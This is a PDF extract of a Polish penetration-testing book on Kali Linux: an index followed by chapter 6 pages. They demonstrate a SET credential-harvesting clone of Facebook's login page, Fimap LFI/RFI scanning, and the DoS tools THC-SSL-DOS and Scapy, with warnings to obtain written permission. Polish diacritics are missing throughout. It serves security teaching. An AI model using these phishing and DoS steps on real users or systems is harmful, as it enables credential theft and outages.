ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 28: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

